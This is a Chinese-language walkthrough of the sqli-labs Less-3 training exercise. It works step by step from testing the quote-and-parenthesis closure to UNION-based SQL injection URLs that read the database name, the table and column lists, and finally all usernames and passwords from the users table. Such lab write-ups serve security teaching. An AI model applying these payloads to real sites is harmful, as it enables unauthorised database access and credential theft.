1、访问http://www.any.com/sqli/Less-3/?id=1,页面正常。
2、加入单引号,访问http://www.any.com/sqli/Less-3/?id=1',会报错。
然后访问网址http://www.any.com/sqli/Less-3/?id=1' and 1=1 %23,会报错。
访问http://www.any.com/sqli/Less-3/?id=1') ,会报错。
http://www.any.com/sqli/Less-3/?id=1') and 1=1 %23,不会报错。
http://www.any.com/sqli/Less-3/?id=1') and 1=2 %23,会报错。
证明闭合字符是单引号和括号。
3、判断列数(通过二分法)。输入:http://www.any.com/sqli/Less-3/?id=1') order by 3 %23,页面正常,说明大于等于3列。
4、输入:http://www.any.com/sqli/Less-3/?id=1') order by 4 %23,提示Unknown column ‘4’ in ‘order clause’,说明小于4列,结合上面的可以确定有三列。
5、查看显错点http://www.any.com/sqli/Less-3/?id=1') and 1=2 union select 11,22,33 %23,显错点在第二个和第三个位置。
6、查看用户信息、数据库名称、mysql版本信息。http://www.any.com/sqli/Less-3/?id=1') and 1=2 union select 11,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),33 %23
7、查看security数据库中所有表。http://www.any.com/sqli/Less-3/?id=1') and 1=2 union select 1,2,unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema='security' %23,得到所有的表为:emails,referers,uagents,users。
8、查看users表中所有列。http://www.any.com/sqli/Less-3/?id=1') and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' %23,得到所有的列为:id,username,password。
9、查看所有列的值。http://www.any.com/sqli/Less-3/?id=1') and 1=2 union select 1,2,group_concat(id,' ',username,' ',password) from security.users %23
